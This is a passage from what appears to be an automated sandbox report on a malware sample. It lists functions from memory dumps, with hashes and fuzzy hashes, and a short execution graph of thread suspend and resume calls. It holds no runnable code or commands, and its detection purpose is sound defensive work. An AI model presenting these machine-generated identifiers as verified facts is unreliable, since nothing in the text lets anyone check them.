                                                                      • Instruction Fuzzy Hash: 7A11E171D0D6AA8EE702BB24C8142EA7B70EF82350F0441B6D844DB2D2DF3C6904CB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D6929 Relevance: .1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5e064f93f5dd180649f1aa3895e600e71a83c746547026d51cee974a7cffca32
                                                                      • Instruction ID: f9b35f6f84c2cd2a8d230db422e1948e3d8e3425d047ec121784c0d4425d6dc8
                                                                      • Opcode Fuzzy Hash: 5e064f93f5dd180649f1aa3895e600e71a83c746547026d51cee974a7cffca32
                                                                      • Instruction Fuzzy Hash: 2F112A70808A8D8FDF85EF68C899AE97FF0FF29301F0505AAD418D7251DB34A554CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D7109 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ffbab9ebe1c51c28a84ec9cdfa6735c5ae75f3703356c41604339332037c7e76
                                                                      • Instruction ID: 4a637631b244d2c0612b58932864e4683c9195bb2db9bd493d85b6bc65c990a4
                                                                      • Opcode Fuzzy Hash: ffbab9ebe1c51c28a84ec9cdfa6735c5ae75f3703356c41604339332037c7e76
                                                                      • Instruction Fuzzy Hash: 92112A70918A8C9FCF45EF18C8999E97FB0FF69305F1542AAE808D7151D734E594CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495DA559 Relevance: .0, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c3fd6de6b35ca1f921e15d19eb8b0342d1309870e84b9ca404d74f25582745b9
                                                                      • Instruction ID: 175fa1cae131fef1f7daa715f690ce6ce83028694f409307eac953e9ec949dae
                                                                      • Opcode Fuzzy Hash: c3fd6de6b35ca1f921e15d19eb8b0342d1309870e84b9ca404d74f25582745b9
                                                                      • Instruction Fuzzy Hash: DB113C7080868DCFCB45DF28C8589AA7BF0FF68301F0545AAE458C7192DB34D954CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D2628 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1f83e27f3f186238a9ce063b902500758476208308455178dd6dbb900f364823
                                                                      • Instruction ID: 1cd2fd8b16c3b4526a1fcf7662cb5c3863e97f39ca8b7d71a90e12bb829968ce
                                                                      • Opcode Fuzzy Hash: 1f83e27f3f186238a9ce063b902500758476208308455178dd6dbb900f364823
                                                                      • Instruction Fuzzy Hash: F401A23144E7C94FD716AF306C652E57F64EF02340F1A42ABD098C74D3DA6D5555C382
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D0BE9 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8cb77053c8ee64f083d805e299dc9b9160d38c12b9adedb900e3cf04b6e8a9a8
                                                                      • Instruction ID: 3c4c5dc31a69c662b50168a55c64811df15ce8f5331c71c1ba9220e5e1a91561
                                                                      • Opcode Fuzzy Hash: 8cb77053c8ee64f083d805e299dc9b9160d38c12b9adedb900e3cf04b6e8a9a8
                                                                      • Instruction Fuzzy Hash: 81112D70808A8D8FDF85EF68C858AAA7FF0FF25301F15059BD418D71A2DB359594CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495DA8A9 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05421ba1f7efdde5e34cb600ffd9255d57cf1556c567f1c694253e440abd42c9
                                                                      • Instruction ID: c50160318f87632c1b0b9b075df073fa5c1bf44c2685fd1c9c8c499cf0c45905
                                                                      • Opcode Fuzzy Hash: 05421ba1f7efdde5e34cb600ffd9255d57cf1556c567f1c694253e440abd42c9
                                                                      • Instruction Fuzzy Hash: D9116D70808A8D8FDF85EF68C858AAA7FF0FF68301F05019AD818C71A1DB309954CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D0CB8 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e55f726edf250a7e577d915b775eb8ec917bd4e496dad6e7107e15932524f870
                                                                      • Instruction ID: d403b244d654e0906fcdcb534ad8e4c6dda24ed3bac7bbce338151c305458050
                                                                      • Opcode Fuzzy Hash: e55f726edf250a7e577d915b775eb8ec917bd4e496dad6e7107e15932524f870
                                                                      • Instruction Fuzzy Hash: BD01EC30914A4C9FDF48EF58C889AE97BF0FB68345F11426AA81DD3250DB70E591CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F106A5 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7355d4ece654dbcb01b08b36631f46f752b24e41190a7467d01c66a8cc7e4834
                                                                      • Instruction ID: ce9cde3c89a5e18a6a288ea7dc4f0ad7eccf486e55179ebcc1cb4e1cb47b4f0b
                                                                      • Opcode Fuzzy Hash: 7355d4ece654dbcb01b08b36631f46f752b24e41190a7467d01c66a8cc7e4834
                                                                      • Instruction Fuzzy Hash: 89017C3180DA1E9FEB81FF58A4041EDB7A0FF94350F100432E808C2191EB396990CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D2059 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b48b7f4241f19a75e4c537bf9ff0d0268bc542143aac0c68aed0e68d938e9de0
                                                                      • Instruction ID: 23551bb18cbe00beab9a11ba1268d258b4c319e6b48f31457e04858d8b122be2
                                                                      • Opcode Fuzzy Hash: b48b7f4241f19a75e4c537bf9ff0d0268bc542143aac0c68aed0e68d938e9de0
                                                                      • Instruction Fuzzy Hash: AF012930808A8C8FDF85EF28C859A997FF0FF29301F0541AAD409C71A2D735E954CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F10B95 Relevance: .0, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cce624de875da24b4ddef6973dc9599dd59f3c753037d2c045b679e8045e7f9c
                                                                      • Instruction ID: 8fb83fe69eb3a39a37de06ba810787dd01dea01c61dc2ebeb756332eb2292592
                                                                      • Opcode Fuzzy Hash: cce624de875da24b4ddef6973dc9599dd59f3c753037d2c045b679e8045e7f9c
                                                                      • Instruction Fuzzy Hash: F801D23092864DCFCB44EF18D885AE97BE0FB58344F140169E859D3250D734E960CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D9909 Relevance: .0, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ea6d8f0ce0733d87220740ad4004aea9876eadd677b71dab8df0293319edaa5
                                                                      • Instruction ID: 01b49530d921429b58ea8a948da56595a6791d14d7041b4221bad0be0c303bda
                                                                      • Opcode Fuzzy Hash: 3ea6d8f0ce0733d87220740ad4004aea9876eadd677b71dab8df0293319edaa5
                                                                      • Instruction Fuzzy Hash: CE018F7090968C8FCF86EF18C858AA97FB0FF65300F0541DAD408C71A2DB359994CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495DA979 Relevance: .0, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c22094d257406c6f22efdd82a59c8ae6e4f70bf103d7bf7f193cd0ef86f3a608
                                                                      • Instruction ID: 8555ecaa522dcbf6906e14259750a5245d815094a951021bb57d3a2760730174
                                                                      • Opcode Fuzzy Hash: c22094d257406c6f22efdd82a59c8ae6e4f70bf103d7bf7f193cd0ef86f3a608
                                                                      • Instruction Fuzzy Hash: 7F01623190868C8FCF45DF24C899AEA7FB0FF65301F1541DAD419C7152DB759994CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D2070 Relevance: .0, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2b37957175474272d4224fe420552dec7719c8dc1814746c3ea0a427e84b1cde
                                                                      • Instruction ID: 2ff2bb9fe3122c26c0c8cdc72e814b780ef7a1194e5bbe441e3bd1a125a3c809
                                                                      • Opcode Fuzzy Hash: 2b37957175474272d4224fe420552dec7719c8dc1814746c3ea0a427e84b1cde
                                                                      • Instruction Fuzzy Hash: 20F0EC30914A4C9FDF84EF58D849AEA7BF0FB68305F1045AAA40DD3250DB31E594CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F113A0 Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2db417d7cc8601902ff7404d59868886f0e21321b1e53041ae323a95de23090e
                                                                      • Instruction ID: 2edfe82b8ab59776e32a1c17c02721208f69bd43044a5649b232702bc94364ca
                                                                      • Opcode Fuzzy Hash: 2db417d7cc8601902ff7404d59868886f0e21321b1e53041ae323a95de23090e
                                                                      • Instruction Fuzzy Hash: 71F0A970918A4D9FDF95EF58D448AAA7BE0FF28345F040465E819C3260D730E594CB84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D5CDD Relevance: .0, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 40e62f1e2525f4c628bb79487b6bac1e3c404c01e84ebebfa1a36278135d6fa6
                                                                      • Instruction ID: 8a1c5e26d7ee2efc5c3630daca31f1316c07027a8af598f5ac3cb066657bfcde
                                                                      • Opcode Fuzzy Hash: 40e62f1e2525f4c628bb79487b6bac1e3c404c01e84ebebfa1a36278135d6fa6
                                                                      • Instruction Fuzzy Hash: B7F06D7180D7CD8FDB55EF1888592D97BA0FF28300F4546BAE44887191DB39E554CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F106C8 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 027439534d3988a2779e21e934ef481e473a9ebfc146fc41a1bf14f7133dc033
                                                                      • Instruction ID: ad7e14ba5661d963c02e5ff955dc2e5dae5377aa704ecdcb26936511996c3c5b
                                                                      • Opcode Fuzzy Hash: 027439534d3988a2779e21e934ef481e473a9ebfc146fc41a1bf14f7133dc033
                                                                      • Instruction Fuzzy Hash: 93F01C30818A4D9FEB84FF68D4496EABBE0FF58341F500466E80CD2190DB35A6A0CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F151E3 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 21f6e59dc804e46f4b3565dfbad10e4b24957f5d7d1cc3dad2f5abb04678231f
                                                                      • Instruction ID: 80d466d2e658dac2db0bf1e8ba57673b484693d6c0f308e848e20a0a07880292
                                                                      • Opcode Fuzzy Hash: 21f6e59dc804e46f4b3565dfbad10e4b24957f5d7d1cc3dad2f5abb04678231f
                                                                      • Instruction Fuzzy Hash: 90F0FE30E1941A8FE7A4EB18CC546E9B7B1FF84381F4041F5D00EE66D1DE342E868B44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D2660 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 736af4a3a3141cb10cc4e9e96e151aba55758711ccfa71bded71bec16bd9caf0
                                                                      • Instruction ID: ba17ccd4ab6fe3c62c9d44f033476310bcc02d52082e0f8c89ddf608d2bc5ba9
                                                                      • Opcode Fuzzy Hash: 736af4a3a3141cb10cc4e9e96e151aba55758711ccfa71bded71bec16bd9caf0
                                                                      • Instruction Fuzzy Hash: 04E04F30809A4E8FDB54FF54E8452EA7BA4FF58340F014636E41CC2180DB74A564CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D7873 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 85e0c9cb914da2fa9681b8f02073953063f563c3b9a13369972412a9739b0e8b
                                                                      • Instruction ID: dea6b3457b6f646306dc2c304e63900662ca6d7bf854d73d44be4a17444332ae
                                                                      • Opcode Fuzzy Hash: 85e0c9cb914da2fa9681b8f02073953063f563c3b9a13369972412a9739b0e8b
                                                                      • Instruction Fuzzy Hash: EAD0C750E1C5C6AEE678BB55484153C1095AFC4380FB5C375C01FC1381CC2DBA45D245
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00007FF848F1087A Relevance: .2, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7788f3882dc9073f282096019fccaa4d1749a4fbda83050d12f12831796fdf3e
                                                                      • Instruction ID: fed2b48bf74177dff84730e046b48d89687cab0c3884103814a617a40e65ac7d
                                                                      • Opcode Fuzzy Hash: 7788f3882dc9073f282096019fccaa4d1749a4fbda83050d12f12831796fdf3e
                                                                      • Instruction Fuzzy Hash: 48719070508A4D8FEBA8EF58D845BF977E0FB59340F10412AE84DC7291DB75A981CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490BBABD Relevance: .1, Instructions: 102COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2318379558.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8490b0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 50afe428efe69ec072fa1969a16ca27c317a07307f2b5b5cd9d8d822ca59a10a
                                                                      • Instruction ID: d493060739fd5ab0dfcd07d5cd06d506dd4bcc7a84107438aa6047c305d9abf8
                                                                      • Opcode Fuzzy Hash: 50afe428efe69ec072fa1969a16ca27c317a07307f2b5b5cd9d8d822ca59a10a
                                                                      • Instruction Fuzzy Hash: CB31E370D08A5D8FCF88EF98D891AEDBBF1FB69300F20116AD419E3281CA75A941CB44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F109B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: 1acb73adb3914d3294bcb7765c7a730db41e67a0fbf2eba9f55f8e10c8d0c0ff
                                                                      • Instruction ID: 7264f1f3ceec9e898714eb623a64cba802faf005eb3196e307665986fab4524d
                                                                      • Opcode Fuzzy Hash: 1acb73adb3914d3294bcb7765c7a730db41e67a0fbf2eba9f55f8e10c8d0c0ff
                                                                      • Instruction Fuzzy Hash: 88413A16A2F566A9E25137BDB0125EA6B64EF813BDF084777E14C8D1C38F0C688582FD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:4.6%
                                                                      Dynamic/Decrypted Code Coverage:75%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:12
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 56209 7ff8490c0d95 56210 7ff8490c0daf GetFileAttributesW 56209->56210 56212 7ff8490c0e75 56210->56212 56217 7ff8490becbb 56218 7ff8490becc6 ResumeThread 56217->56218 56220 7ff8490bedc4 56218->56220 56205 7ff8490bee19 56206 7ff8490bee27 FindCloseChangeNotification 56205->56206 56208 7ff8490bef04 56206->56208 56213 7ff8490bd4cd 56214 7ff8490bd4db SuspendThread 56213->56214 56216 7ff8490bd5b4 56214->56216

                                                                      Executed Functions

                                                                      Function 00007FF848F2B9FD Relevance: 4.3, Strings: 1, Instructions: 3030COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f2b000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: fM_H
                                                                      • API String ID: 0-40886633
                                                                      • Opcode ID: 74ddc77d07b838ea7d3c3fe1ed64de0d781ed899b8e3cd77357b0b41ee242a34
                                                                      • Instruction ID: 984d74534a992aeac7f125e3e276c8df6502e92644e2c2dd869f85c7de3bac07
                                                                      • Opcode Fuzzy Hash: 74ddc77d07b838ea7d3c3fe1ed64de0d781ed899b8e3cd77357b0b41ee242a34
                                                                      • Instruction Fuzzy Hash: 3643F870D0992D8FDBA8EB18D895BA9B7B1FF59341F1042E9C00DE3292DB356A81CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CEC10 Relevance: 3.0, Strings: 2, Instructions: 543COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: V3_^$W3_^
                                                                      • API String ID: 0-4200353899
                                                                      • Opcode ID: fb638e80952dddae736b184124f4494b4eacbded755f65fb0ee17f5c5bc74acc
                                                                      • Instruction ID: ca08f37ac7be53f4fbbff3aafb399ce894916ddd73505f6d04680e50775fb0bf
                                                                      • Opcode Fuzzy Hash: fb638e80952dddae736b184124f4494b4eacbded755f65fb0ee17f5c5bc74acc
                                                                      • Instruction Fuzzy Hash: 0EF1AB22C0F6D6AFE755FF78E8954E63F60FF11698B1802B7D04C8E093DE1DA8468255
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C868A Relevance: .7, Instructions: 704COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fedc65b316cc7db7b71990ceb8325fa502ba7ec7b039c7eed8e4bb9b61afa1f5
                                                                      • Instruction ID: b1593ee074980de056d47f284aafc582c29c2e0e1d18b0b5260a29796fe47b8e
                                                                      • Opcode Fuzzy Hash: fedc65b316cc7db7b71990ceb8325fa502ba7ec7b039c7eed8e4bb9b61afa1f5
                                                                      • Instruction Fuzzy Hash: CF326B70919A8D8FEBB8EF28C8597E937E1FB69341F10413AD84ECB691DB785580CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C9AE2 Relevance: .7, Instructions: 675COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: daf6caf3d0d97bb0b373a3e8fc31e885cc1270d9256bf5a6a145987a3247c3d6
                                                                      • Instruction ID: efb4785f56bf40c564ffe0de9a0f7c680c61d1e7311d2a92872af4deff9d6c9f
                                                                      • Opcode Fuzzy Hash: daf6caf3d0d97bb0b373a3e8fc31e885cc1270d9256bf5a6a145987a3247c3d6
                                                                      • Instruction Fuzzy Hash: 96326B70919A8D8FEBB8EF28C8597E937E1FB69341F10413AD84DCB291DB749684CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CBEAF Relevance: .6, Instructions: 604COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 632a849c0f7dedb9b452d32f485e96ddbeffae2c225167d4821bb109811f633e
                                                                      • Instruction ID: f4c0a0a8a26eb7ce92767c7029f9262f23a0602d22539b84147b00a15e0e2ee6
